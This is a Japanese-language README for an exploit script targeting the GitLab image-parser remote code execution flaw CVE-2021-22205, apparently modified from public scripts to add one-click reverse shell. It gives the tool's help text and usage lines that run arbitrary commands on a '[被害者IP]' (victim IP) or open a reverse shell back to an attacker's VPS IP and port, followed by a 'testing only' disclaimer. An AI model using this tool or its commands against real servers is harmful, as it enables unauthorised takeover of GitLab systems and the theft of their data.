
CVE-2021-22205 検出スクリプト、getshell およびコマンド実行をサポート。
GitLabは、ファイルパーサーに渡される画像ファイルを正しく検証していないため、コマンド実行が可能になっています。攻撃者は悪意のあるリクエストを構築してこの脆弱性を利用することで、対象システム上で任意のコマンドを実行し、最終的にGitLabサーバーを制御することができます。ネット上に公開されているスクリプトの多くはリバースシェル機能が不足しているため、公開スクリプトを修正し、ワンクリックでgetshellできる機能を追加しました。
______ _______ ____ ___ ____ _ ____ ____ ____ ___ ____
/ ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \|___ \|___ \ / _ \| ___|
| | \ \ / /| _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) |
\____ | \_/ |_____| |_____|\___/_____|_| |_____|_____|_____|\___/|____/
usage: CVE-2021-22205.py [-h] [-t TARGET] [-c COMMAND] [--shell] [-i IP]
[-p PORT]
GitLab < 13.10.3 RCE
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
対象URL
-c COMMAND, --command COMMAND
コマンドを実行
--shell リバースシェルを実行するかどうか
-i IP, --ip IP リバースシェル ip
-p PORT, --port PORT リバースシェルポート
python3 CVE-2021-22205.py -t [被害者IP] --shell -i [vps ip] -p [vps port] //リバースシェル
python3 CVE-2021-22205.py -t [被害者IP] -c [command] //コマンドを実行
このスクリプトはテスト目的でのみ使用してください。他の目的には使用しないでください。